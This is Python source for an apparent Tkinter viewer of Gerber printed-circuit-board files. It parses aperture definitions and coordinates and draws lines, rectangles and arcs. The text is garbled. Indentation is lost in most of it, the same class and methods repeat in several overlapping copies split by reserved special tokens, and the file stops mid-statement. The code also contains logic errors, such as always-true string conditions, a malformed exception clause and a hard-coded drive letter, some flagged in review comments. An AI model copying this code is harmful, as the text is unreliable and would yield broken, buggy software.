if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value:
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x) / 2)
elif 'C,' in value:
print(value)
self.current_aperture = self.__get_circle_diameter(
value)
elif 'O,' in value:
pass
elif 'P,' in value:
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.
units_string[GerberCanvas.units], str(y0) +
GerberCanvas.units_string[GerberCanvas.units], str(
x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.
units], outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
if self.file_gto:
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x,
',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.
start_y + 'i', self.x + 'i', self.y + 'i', width=
self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x -
radius) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], outline='black', width=self.
current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
break
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(
self.start_y) - cp_y, float(self.start_x) -
cp_x))
end_angle = math.degrees(math.atan2(float(self.
y) - cp_y, float(self.x) - cp_x))
try:
self.my_canvas.create_arc(str(cp_x + radius
) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], style=tk.ARC, width=self.
current_aperture, start=start_angle,
extent=end_angle - start_angle, outline
='black')
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x + 1:len(value)]
print(width, length)
return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y),
float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = 1 - distance ** 2 / (2 * radius ** 2)
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start + 1:j_start]
j_temp = item[j_start + 1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start + 1:y_start]
y_temp = item[y_start + 1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start + 1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number) - 5]
if '-' in number:
return first + '.' + last
else:
return first + '.' + last
<|reserved_special_token_0|>
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
temp_list = self.file_commands
for item in temp_list:
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
self.__get_numbers(item)
self.my_canvas.create_line(self.start_x + 'i', self.start_y +
'i', self.x + 'i', self.y + 'i', width=self.
current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i',
str(cp_y - radius) + 'i', str(cp_x + radius) +
'i', str(cp_y + radius) + 'i', outline='black',
width=self.current_aperture)
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.
start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) -
cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i',
str(cp_y + radius) + 'i', str(cp_x - radius) +
'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GerberCanvas:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {}
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.
my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.
HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,
yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
<|reserved_special_token_0|>
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines(
)
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D':
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value:
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x) / 2)
elif 'C,' in value:
print(value)
self.current_aperture = self.__get_circle_diameter(
value)
elif 'O,' in value:
pass
elif 'P,' in value:
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.
units_string[GerberCanvas.units], str(y0) +
GerberCanvas.units_string[GerberCanvas.units], str(
x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.
units], outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
if self.file_gto:
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x,
',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.
start_y + 'i', self.x + 'i', self.y + 'i', width=
self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x -
radius) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], outline='black', width=self.
current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
break
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(
self.start_y) - cp_y, float(self.start_x) -
cp_x))
end_angle = math.degrees(math.atan2(float(self.
y) - cp_y, float(self.x) - cp_x))
try:
self.my_canvas.create_arc(str(cp_x + radius
) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], style=tk.ARC, width=self.
current_aperture, start=start_angle,
extent=end_angle - start_angle, outline
='black')
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x + 1:len(value)]
print(width, length)
return width, length
    def __get_extent(self, radius):
        """Return an arc angle (radians) for the current move.

        Uses the chord between (start_x, start_y) and (x, y) with the
        law of cosines: cos(angle) = 1 - chord**2 / (2 * radius**2).

        NOTE(review): only the fractional part of that cosine is passed
        to math.acos (``number - int(number)``), presumably to keep the
        argument inside acos's [-1, 1] domain -- confirm this is the
        intended math before reusing this helper.
        """
        distance = self.__distance(float(self.start_x), float(self.start_y),
            float(self.x), float(self.y))
        if DEBUG:
            print('distance = ', distance)
        number = 1 - distance ** 2 / (2 * radius ** 2)
        result = number - int(number)
        return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
    def __get_numbers(self, item):
        """Extract I/J and X/Y values from one Gerber draw command.

        Results are stored on self.i/self.j and self.x/self.y as decimal
        strings produced by __format_number.  J and Y values are negated,
        presumably to map Gerber's y-up coordinates onto the canvas's
        y-down system -- TODO confirm.
        """
        # 'found' arbitrates between the extraction branches below so at
        # most one X/Y branch runs per command.
        found = 0
        if 'I' in item and 'J' in item and found == 0:
            found = 1
            i_start = item.find('I')
            j_start = item.find('J')
            d_start = item.find('D')
            i_temp = item[i_start + 1:j_start]
            j_temp = item[j_start + 1:d_start]
            j_temp = str(int(j_temp) * -1)
            self.i = self.__format_number(i_temp)
            self.j = self.__format_number(j_temp)
            # NOTE(review): operator precedence makes this equivalent to
            # ('Y' in item); the 'X' literal is always truthy.  It re-arms
            # 'found' so the X/Y branch below can also run.
            if 'X' and 'Y' in item:
                found = 0
        if 'X' in item and 'Y' in item and found == 0:
            found = 1
            x_start = item.find('X')
            y_start = item.find('Y')
            d_start = item.find('D')
            x_temp = item[x_start + 1:y_start]
            y_temp = item[y_start + 1:d_start]
            # NOTE(review): ('I' or 'J') evaluates to 'I', so only an 'I'
            # terminator is actually detected here -- confirm 'J' cannot
            # directly follow the Y value in practice.
            if ('I' or 'J') in y_temp:
                for i in range(1, len(y_temp)):
                    if y_temp[i] == 'I':
                        y_temp = y_temp[0:i]
                        break
            y_temp = str(int(y_temp) * -1)
            self.x = self.__format_number(x_temp)
            self.y = self.__format_number(y_temp)
        if 'X' in item and found == 0:
            found = 1
            x_start = item.find('X')
            d_start = item.find('D')
            x_temp = item[x_start + 1:d_start]
            self.x = self.__format_number(x_temp)
        if 'Y' in item and found == 0:
            found = 1
            y_start = item.find('Y')
            d_start = item.find('D')
            y_temp = item[y_start + 1:d_start]
            y_temp = str(int(y_temp) * -1)
            self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number) - 5]
if '-' in number:
return first + '.' + last
else:
return first + '.' + last
def high_lite_part(self, x, y, layer):
x1 = self.__format_pnp(x)
y1 = self.__format_pnp(y) * -1
last_x = float(x1) + 0.1
last_y = float(y1) + 0.1
if layer == 'TopLayer':
color = 'red'
else:
color = 'blue'
self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i',
str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=
color, fill=color)
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
    def __parse_file_gtp(self):
        """Parse self.file_commands and draw lines/arcs on the canvas.

        NOTE(review): this looks like an older private duplicate of
        __parse_file -- it reads self.file_commands (not the GTP command
        list) and nothing visible in this file calls it.  Confirm before
        relying on it.
        """
        temp_list = self.file_commands
        for item in temp_list:
            # %FSLA: coordinate format -- digit counts around the implied
            # decimal point, e.g. '%FSLAX25Y25*%' -> '25'.
            if '%FSLA' in item:
                self.x_format = item[6:8]
                self.y_format = item[9:11]
            # %MO: units (inches or millimeters).
            if '%MO' in item:
                self.units = item[3:5]
                if 'IN' in item:
                    self.__inch = 1
                    self.__mm = 0
                if 'MM' in item:
                    self.__inch = 0
                    self.__mm = 1
            if 'G01' in item:
                self.graphics_mode = 1
            # G03/G02: counter-clockwise / clockwise arc direction.
            if 'G03' in item:
                self.direction = 270
            if 'G02' in item:
                self.direction = 90
            # G74/G75: single- vs multi-quadrant arc mode.
            if 'G74' in item:
                self.quadrant_mode = 0
            if 'G75' in item:
                self.quadrant_mode = 1
            # %AD: aperture definition, stored under its D-code name.
            if '%AD' in item:
                name = item[3:item.find(',') - 1]
                start = item.find(',')
                stop = item.find('*', start)
                value = item[start - 1:stop]
                self.AD_commands[name] = value[2:len(value)]
            # Bare D-code: select the matching aperture definition.
            if item[0:1] == 'D':
                item = item[0:item.find('*')]
                for key, value in self.AD_commands.items():
                    if item in key:
                        self.current_aperture = value
            # D02: move without drawing -- update the start point.
            if 'D02' in item:
                self.__get_numbers(item)
                if 'X' in item and 'Y' not in item:
                    self.start_x = self.x
                if 'Y' in item and 'X' not in item:
                    self.start_y = self.y
                if 'X' in item and 'Y' in item:
                    self.start_x = self.x
                    self.start_y = self.y
            # D01 without I/J: straight-line draw.
            if 'D01' in item and ('I' not in item and 'J' not in item):
                self.__get_numbers(item)
                self.my_canvas.create_line(self.start_x + 'i', self.start_y +
                    'i', self.x + 'i', self.y + 'i', width=self.
                    current_aperture + 'i')
                self.start_x = self.x
                self.start_y = self.y
            # D01 with I/J: arc draw.  NOTE(review): operator precedence
            # makes this condition equivalent to ('J' in item).
            if 'D01' and 'I' and 'J' in item:
                self.start_x = self.x
                self.start_y = self.y
                self.__get_numbers(item)
                if self.quadrant_mode:
                    # Same start and end point: full circle centred at
                    # (start + I, start + J).
                    if self.start_x == self.x and self.start_y == self.y:
                        cp_x = float(self.start_x) + float(self.i)
                        cp_y = float(self.start_y) + float(self.j)
                        # NOTE(review): self.i is a string, so 'self.i != 0'
                        # is always true and 'radius' is always taken from
                        # I -- confirm intended.
                        if self.i != 0:
                            radius = float(self.i)
                        elif self.j != 0:
                            radius = float(self.j)
                        self.my_canvas.create_oval(str(cp_x - radius) + 'i',
                            str(cp_y - radius) + 'i', str(cp_x + radius) +
                            'i', str(cp_y + radius) + 'i', outline='black',
                            width=self.current_aperture)
                    else:
                        cp_x = float(self.start_x) + float(self.i)
                        cp_y = float(self.start_y) + float(self.j)
                        if float(self.i) > 0:
                            radius = float(self.i)
                        elif float(self.j) > 0:
                            radius = float(self.j)
                        self.__set_direction()
                        # Angles of the start and end points as seen from
                        # the arc centre.
                        start_angle = math.degrees(math.atan2(float(self.
                            start_y) - cp_y, float(self.start_x) - cp_x))
                        end_angle = math.degrees(math.atan2(float(self.y) -
                            cp_y, float(self.x) - cp_x))
                        # NOTE(review): 'ext' is computed but never used.
                        ext = math.degrees(self.__get_extent(radius))
                        self.my_canvas.create_arc(str(cp_x + radius) + 'i',
                            str(cp_y + radius) + 'i', str(cp_x - radius) +
                            'i', str(cp_y - radius) + 'i', style=tk.ARC,
                            width=self.current_aperture, start=start_angle,
                            extent=end_angle - start_angle, outline='black')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GerberCanvas:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    def __init__(self, frame):
        """Build the canvas inside *frame* and reset all parser state."""
        # Gerber coordinate format (integer/decimal digit counts) from %FSLA.
        self.x_format = ''
        self.y_format = ''
        # Unit spec text from %MO ('IN' or 'MM').
        self.units = ''
        # G74/G75 arc quadrant mode flag.
        self.quadrant_mode = 0
        # Raw command lines of the loaded .GTO and .GTP files.
        self.file_commands = ''
        self.file_gtp_commands = ''
        self.gerber_file_name = ''
        # Aperture definitions keyed by D-code name (%AD commands).
        self.AD_commands = {}
        self.current_aperture = ''
        # Current and previous plot coordinates, kept as strings.
        self.x = '0'
        self.y = '0'
        self.i = '0'
        self.j = '0'
        self.last_x = ''
        self.last_y = ''
        self.start_x = ''
        self.start_y = ''
        self.direction = 0
        self.graphics_mode = 0
        # True once the view has been zoomed at least once.
        self.scaled = False
        self.bounding_box_size = ()
        self._canvas_frame = frame
        self.create_canvas()
    def create_canvas(self):
        """Create the Tk canvas plus scrollbars and bind zoom events."""
        self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
        self.my_canvas.pack(expand=True, fill='both')
        # X11 reports the mouse wheel as Button-4/5; Windows and macOS
        # deliver <MouseWheel> events carrying a signed 'delta'.
        if sys.platform == 'linux':
            self.my_canvas.bind('<Button-4>', self.__scale_image_up)
            self.my_canvas.bind('<Button-5>', self.__scale_image_down)
        else:
            self.my_canvas.bind('<MouseWheel>', self.__scale_image)
        self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.
            my_canvas.yview)
        self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
        self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.
            HORIZONTAL, command=self.my_canvas.xview)
        self.x_scrollbar.pack(fill='x', anchor='s')
        # NOTE(review): the scrollbar-to-canvas wiring only happens on
        # Linux, so the scrollbars will not drive the canvas on other
        # platforms -- confirm whether this is intentional.
        if sys.platform == 'linux':
            self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,
                yscrollcommand=self.y_scrollbar.set)
        # Canvas item id of the current part highlight (0 = none).
        self.__part_selected = 0
    def load_gerber(self, path, file):
        """Load a .GTO (silkscreen) Gerber file and draw it.

        Clears any previously drawn items first, then parses and draws the
        file, and finally loads the matching .GTP file.

        :param path: path to the file
        :param file: file name to use
        """
        try:
            # Remove everything drawn by a previous load.
            all_ids = self.my_canvas.find_all()
            if all_ids:
                try:
                    for item in all_ids:
                        print(item)
                        self.my_canvas.delete(item)
                except tk.TclError:
                    messagebox.showerror('Error', tk.TclError)
            if path:
                # Flag used by __parse_file to enable silkscreen drawing.
                self.file_gto = True
                try:
                    with open(os.path.join(path, file), 'r') as gerber_file:
                        self.file_commands = gerber_file.read().splitlines()
                except TypeError:
                    messagebox.showerror('Type Error', 'Invalid File Type')
                self.__parse_file(self.file_commands)
                # Red origin marker at (0, 0).
                self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')
                self.gerber_file_name = file
                self.scaled = False
                if DEBUG:
                    print('Scroll region is : ', self.bounding_box_size)
        except IOError:
            messagebox.showerror('File Error', 'File did not open, GTO')
        finally:
            # NOTE(review): this finally block runs even when the GTO load
            # failed, so the GTP file is always attempted -- confirm this
            # is intentional.
            self.file_gto = False
            self.load_gerber_gtp(os.path.join(path, file))
            self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))
    def load_gerber_gtp(self, file_path):
        """Load and draw the .GTP (paste) file matching a loaded .GTO file.

        :param file_path: full path of the .GTO file; the 3-character
            extension is swapped for 'GTP'.
        """
        self.file_gtp = True
        try:
            print(file_path)
            # NOTE(review): this rebuilds the path as 'c' + path[1:-3] +
            # 'GTP', i.e. it forces the first character (drive letter) to
            # lowercase 'c' while swapping the extension.  That only works
            # for paths on drive C: -- confirm.
            new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'
            print('final name =', new_file)
            if file_path:
                try:
                    with open(new_file, 'r') as gerber_file:
                        self.file_gtp_commands = gerber_file.read().splitlines(
                            )
                except TypeError:
                    messagebox.showerror('Type Error', 'Invalid File Type')
                self.__parse_file(self.file_gtp_commands)
        except IOError:
            messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D':
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value:
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x) / 2)
elif 'C,' in value:
print(value)
self.current_aperture = self.__get_circle_diameter(
value)
elif 'O,' in value:
pass
elif 'P,' in value:
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.
units_string[GerberCanvas.units], str(y0) +
GerberCanvas.units_string[GerberCanvas.units], str(
